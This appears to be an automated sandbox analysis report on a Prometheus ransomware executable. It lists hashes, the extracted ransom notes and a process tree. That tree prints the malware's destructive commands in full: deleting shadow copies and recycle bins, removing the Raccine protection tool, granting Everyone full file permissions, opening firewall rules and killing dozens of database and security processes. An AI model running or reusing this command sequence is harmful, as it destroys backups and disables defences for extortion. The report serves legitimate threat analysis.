Resubmissions

13-08-2024 05:39

240813-gcg68swhqg 10

28-05-2021 06:53

210528-9sn3jdwaa2 10

Analysis

  • max time kernel
    129s
  • max time network
    124s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13-08-2024 05:39

General

  • Target

    e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.exe

  • Size

    290KB

  • MD5

    a6dcf23059f6e61fa683907c47baf73e

  • SHA1

    1d55396b26d97b18256513607dcbe3f308569d5b

  • SHA256

    e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3

  • SHA512

    72ef9997b814807e677e7861a94de3c8c2b7cb350ab79c887de61f505f23ebc2e3db177b34e86f1dedb3017f468e5c6c0f34d188c574e4cbe20410ff1bf596f7

  • SSDEEP

    6144:a7QOomfMNffeRQHO1l+E9eWGktbD3xEKHb6Em:aVomfwfahxND3xEKHbH

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt

Family

prometheus

Ransom Note
YOUR COMPANY NETWORK HAS BEEN HACKED All your important files have been encrypted! Your files are safe! Only modified.(AES) No software available on internet can help you. We are the only ones able to decrypt your files. -------------------------------------------------------------------------------- We also gathered highly confidential/personal data. These data are currently stored on a private server. Files are also encrypted and stored securely. -------------------------------------------------------------------------------- As a result of working with us, you will receive: Fully automatic decryptor, all your data will be recovered within a few hours after it's run. Server with your data will be immediately destroyed after your payment. Save time and continue working. You will can send us 2-3 non-important files and we will decrypt it for free to prove we are able to give your files back. -------------------------------------------------------------------------------- !!!!!!!!!!!!!!!!!!!!!!!! If you decide not to work with us: All data on your computers will remain encrypted forever. YOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER! So you can expect your data to be publicly available in the near future.. The price will increase over time. !!!!!!!!!!!!!!!!!!!!!!!!! -------------------------------------------------------------------------------- It doesn't matter to us what you choose. We only seek money and our goal is not to damage your reputation or prevent your business from running. Write to us now and we will provide the best prices. Instructions for contacting us: 1. Type the addres "https://www.torproject.org" in your Internet browser. It opens the Tor site. 2. Press "Download Tor", then press "Download Tor Browser Bundle", install it. 3. Open the Tor browser. Copy the link http://promethw27cbrcot.onion/ticket.php?track=AA4-MX4-GGQD and paste it in the Tor browser. 7. Start a chat and follow the further instructions. Attention! Any attempt to restore your files with third-party software will corrupt it. Modify or rename files will result in a loose of data. If you decide to try anyway, make copies before that Key Identifier: iT0Xih4WkikzWUO8GOxxljcu4KpWN8BYsdbbezAbPT5l1Szm4BmZZWQ5cR9RmxQ+5kCRvbrqxF7H7GqpOdriVpnxQVilm94xbqg8z8ufzJqI3Cue/rKkm/LYYrZ2Mzvy1MVZKPzOP8RnnkjkQNvaJE2l/8rIotr0+UvUjkTf2w2Rra1GIFy990YuSl3YVouRAzOROXpB46yBizdlNHp19izAWumTjuSWuuYT6IgDKroCrdwdQEbvtx0XD1sHAbmtrG2e7/x1ob6itaU2DwpsYbLkFgcLqlfw7ZC6wms+PU7h9Fq36UYnjyHaomRM5+ZeyE4f3vDC5AdZ/UcLv73qGd41t6eHaHp9UfoiwrGFpzG3HcSdDY1R7Z71K/4xHrsSDb0ij5FL0EA6yCjQh4X44HiMXGKUIwOCvotXHBrVbCMh6GW2gI75n+QFwmktIn0xuc//EFvXLZ7LOlymT8Zar1HxQYl8+cQ39a+5etCTaY1GMsoSSpfBWHpBPdk0J+eUjsiC/sJPJ5lT9MIhW/NSY9K/vmDwOKsz0AwEo6Au9SJ0TUs/0MyO1tUE6dhDCif5GHeGQnzeBsQ9CQ5Y9EHrlC2tJrm3HWQa2hH6R2CF/czg/8FUitbwFj1kfxMoLmaITlKva8FtLSd82Ce689yPFwnm4240bNFO26aYjh/sSNE=
URLs

http://promethw27cbrcot.onion/ticket.php?track=AA4-MX4-GGQD

Extracted

Path

C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta

Family

prometheus

Ransom Note
YOUR COMPANY NETWORK HAS BEEN HACKED All your important files have been encrypted! Your files are safe! Only modified.(AES) No software available on internet can help you. We are the only ones able to decrypt your files. We also gathered highly confidential/personal data. These data are currently stored on a private server. Files are also encrypted and stored securely. As a result of working with us, you will receive: Fully automatic decryptor, all your data will be recovered within a few hours after it’s installation. Server with your data will be immediately destroyed after your payment. Save time and continue working. You will can send us 2-3 non-important files and we will decrypt it for free to prove we are able to give your files back. If you decide not to work with us: All data on your computers will remain encrypted forever. YOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER! So you can expect your data to be publicly available in the near future.. The price will increase over time. It doesn't matter to us what you choose. We only seek money and our goal is not to damage your reputation or prevent your business from running. Write to us now and we will provide the best prices. Instructions for contacting us: 1. Type the addres "https://www.torproject.org" in your Internet browser. It opens the Tor site. 2. Press "Download Tor", then press "Download Tor Browser Bundle", install it. 3. Open the Tor browser. Copy the link http://promethw27cbrcot.onion/ticket.php?track=AA4-MX4-GGQD and paste it in the Tor browser. 7. Start a chat and follow the further instructions. Attention! Any attempt to restore your files with third-party software will corrupt it. Modify or rename files will result in a loose of data. If you decide to try anyway, make copies before that Key Identifier: iT0Xih4WkikzWUO8GOxxljcu4KpWN8BYsdbbezAbPT5l1Szm4BmZZWQ5cR9RmxQ+5kCRvbrqxF7H7GqpOdriVpnxQVilm94xbqg8z8ufzJqI3Cue/rKkm/LYYrZ2Mzvy1MVZKPzOP8RnnkjkQNvaJE2l/8rIotr0+UvUjkTf2w2Rra1GIFy990YuSl3YVouRAzOROXpB46yBizdlNHp19izAWumTjuSWuuYT6IgDKroCrdwdQEbvtx0XD1sHAbmtrG2e7/x1ob6itaU2DwpsYbLkFgcLqlfw7ZC6wms+PU7h9Fq36UYnjyHaomRM5+ZeyE4f3vDC5AdZ/UcLv73qGd41t6eHaHp9UfoiwrGFpzG3HcSdDY1R7Z71K/4xHrsSDb0ij5FL0EA6yCjQh4X44HiMXGKUIwOCvotXHBrVbCMh6GW2gI75n+QFwmktIn0xuc//EFvXLZ7LOlymT8Zar1HxQYl8+cQ39a+5etCTaY1GMsoSSpfBWHpBPdk0J+eUjsiC/sJPJ5lT9MIhW/NSY9K/vmDwOKsz0AwEo6Au9SJ0TUs/0MyO1tUE6dhDCif5GHeGQnzeBsQ9CQ5Y9EHrlC2tJrm3HWQa2hH6R2CF/czg/8FUitbwFj1kfxMoLmaITlKva8FtLSd82Ce689yPFwnm4240bNFO26aYjh/sSNE=
URLs

http://promethw27cbrcot.onion/ticket.php?track=AA4-MX4-GGQD

Signatures

  • Disables service(s) 3 TTPs
  • Prometheus Ransomware

    Ransomware family mostly targeting manufacturing industry and claims to be affiliated with REvil.

  • Renames multiple (174) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Modifies Windows Firewall 2 TTPs 4 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Modifies file permissions 1 TTPs 3 IoCs
  • Modifies WinLogon 2 TTPs 2 IoCs
  • Network Service Discovery 1 TTPs 1 IoCs

    Attempt to gather information on host's network.

  • Launches sc.exe 8 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 12 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Kills process with taskkill 48 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 49 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 2 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.exe
    "C:\Users\Admin\AppData\Local\Temp\e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.exe"
    1⤵
    • Checks computer location settings
    • Drops startup file
    • Modifies WinLogon
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:3512
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill" /F /IM RaccineSettings.exe
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:2280
    • C:\Windows\SYSTEM32\reg.exe
      "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
      2⤵
        PID:2464
      • C:\Windows\SYSTEM32\reg.exe
        "reg" delete HKCU\Software\Raccine /F
        2⤵
        • Modifies registry key
        PID:3044
      • C:\Windows\SYSTEM32\schtasks.exe
        "schtasks" /DELETE /TN "Raccine Rules Updater" /F
        2⤵
          PID:1264
        • C:\Windows\SYSTEM32\cmd.exe
          "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
          2⤵
            PID:2204
          • C:\Windows\SYSTEM32\sc.exe
            "sc.exe" config Dnscache start= auto
            2⤵
            • Launches sc.exe
            PID:2112
          • C:\Windows\SYSTEM32\sc.exe
            "sc.exe" config SSDPSRV start= auto
            2⤵
            • Launches sc.exe
            PID:4948
          • C:\Windows\SYSTEM32\sc.exe
            "sc.exe" config FDResPub start= auto
            2⤵
            • Launches sc.exe
            PID:2200
          • C:\Windows\SYSTEM32\sc.exe
            "sc.exe" config upnphost start= auto
            2⤵
            • Launches sc.exe
            PID:3448
          • C:\Windows\SYSTEM32\sc.exe
            "sc.exe" config SQLTELEMETRY start= disabled
            2⤵
            • Launches sc.exe
            PID:1736
          • C:\Windows\SYSTEM32\sc.exe
            "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
            2⤵
            • Launches sc.exe
            PID:1844
          • C:\Windows\SYSTEM32\cmd.exe
            "cmd.exe" /c rd /s /q D:\\$Recycle.bin
            2⤵
              PID:3848
            • C:\Windows\SYSTEM32\sc.exe
              "sc.exe" config SQLWriter start= disabled
              2⤵
              • Launches sc.exe
              PID:1728
            • C:\Windows\SYSTEM32\sc.exe
              "sc.exe" config SstpSvc start= disabled
              2⤵
              • Launches sc.exe
              PID:2252
            • C:\Windows\SYSTEM32\netsh.exe
              "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
              2⤵
              • Modifies Windows Firewall
              • Event Triggered Execution: Netsh Helper DLL
              PID:2760
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM mspub.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:3920
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM firefoxconfig.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:3836
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM excel.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1060
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM agntsvc.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:3980
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM mydesktopqos.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2876
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM CNTAoSMgr.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:4644
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM thebat.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2436
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM mydesktopservice.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:4352
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM sqlwriter.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:3352
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM mysqld.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:4388
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM steam.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:4956
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM tbirdconfig.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:4972
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM sqbcoreservice.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:3372
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM encsvc.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2968
            • C:\Windows\SYSTEM32\netsh.exe
              "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
              2⤵
              • Modifies Windows Firewall
              • Event Triggered Execution: Netsh Helper DLL
              PID:1936
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM dbeng50.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:4420
            • C:\Windows\SYSTEM32\netsh.exe
              "netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
              2⤵
              • Modifies Windows Firewall
              • Event Triggered Execution: Netsh Helper DLL
              PID:4612
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM thebat64.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:3856
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" IM thunderbird.exe /F
              2⤵
              • Kills process with taskkill
              PID:2184
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM isqlplussvc.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:4844
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM dbsnmp.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1072
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM ocomm.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:3312
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM onenote.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:380
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM xfssvccon.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1512
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM infopath.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1628
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM PccNTMon.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2864
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM mspub.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2980
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM mbamtray.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2744
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM msaccess.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:528
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM Ntrtscan.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:4940
            • C:\Windows\SYSTEM32\netsh.exe
              "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
              2⤵
              • Modifies Windows Firewall
              • Event Triggered Execution: Netsh Helper DLL
              PID:1776
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM zoolz.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:3644
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM outlook.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2280
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM tmlisten.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:3060
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM mydesktopservice.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:652
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM ocautoupds.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2844
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM sqlservr.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:3852
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM msftesql.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1744
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM winword.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1964
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM powerpnt.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1700
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM synctime.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:4992
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM ocssd.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:4000
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM mysqld-nt.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:964
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM mydesktopqos.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2100
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM oracle.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1368
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM wordpad.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:4740
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM visio.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:3764
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM sqlagent.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:4164
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM mysqld-opt.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:4056
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM sqlbrowser.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:3492
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
              2⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:496
              • C:\Windows\System32\Conhost.exe
                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                3⤵
                  PID:4972
              • C:\Windows\SYSTEM32\icacls.exe
                "icacls" "C:*" /grant Everyone:F /T /C /Q
                2⤵
                • Modifies file permissions
                PID:3540
              • C:\Windows\SYSTEM32\icacls.exe
                "icacls" "Z:*" /grant Everyone:F /T /C /Q
                2⤵
                • Modifies file permissions
                PID:2084
              • C:\Windows\SYSTEM32\icacls.exe
                "icacls" "D:*" /grant Everyone:F /T /C /Q
                2⤵
                • Modifies file permissions
                PID:4532
              • C:\Windows\SYSTEM32\arp.exe
                "arp" -a
                2⤵
                • Network Service Discovery
                PID:1056
              • C:\Windows\System32\mshta.exe
                "C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
                2⤵
                  PID:3372

              Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wkl521li.iiz.ps1

                Filesize

                60B

                MD5

                d17fe0a3f47be24a6453e9ef58c94641

                SHA1

                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                SHA256

                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                SHA512

                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

              • C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta

                Filesize

                21KB

                MD5

                f363f899e5ed486f5885501148292bff

                SHA1

                a709ef31c515de039fb25ac582072bcf673ecdf7

                SHA256

                2b72c6c6966a73338c551bc597eb45bb48940687575f3bde9e091fbbe538cfa4

                SHA512

                242733b3fbe41221351474b595ac54e40b96a65f308a3c84873c8a2af332450f5b529ff058646a14857c94286932baf400e6fcd8fe3a15f5978e5e516757057a

              • C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt

                Filesize

                2KB

                MD5

                fce3819bef51d6be4feebefbe4a522ae

                SHA1

                614063f71f644bb25ad5dc96c4f43010d0300b19

                SHA256

                e8c2e5af1b537d0348fce973b89f6a30e35e15a79050bd07d4109800775f30b0

                SHA512

                3b3f32a350105f48a526f60b6178b4f306cfaedcb94e691473edfefa0095bf33da2bcbf879f16b7b6b2e83d0ee0ff9eee4a2962e01d8489e268c4bd313b33a6e

              • memory/496-7-0x0000018FE4D40000-0x0000018FE4D62000-memory.dmp

                Filesize

                136KB

              • memory/3512-1-0x00007FFCBB183000-0x00007FFCBB185000-memory.dmp

                Filesize

                8KB

              • memory/3512-0-0x0000000000B00000-0x0000000000B4E000-memory.dmp

                Filesize

                312KB

              • memory/3512-2-0x00007FFCBB180000-0x00007FFCBBC41000-memory.dmp

                Filesize

                10.8MB

              • memory/3512-457-0x00007FFCBB183000-0x00007FFCBB185000-memory.dmp

                Filesize

                8KB

              • memory/3512-458-0x00007FFCBB180000-0x00007FFCBBC41000-memory.dmp

                Filesize

                10.8MB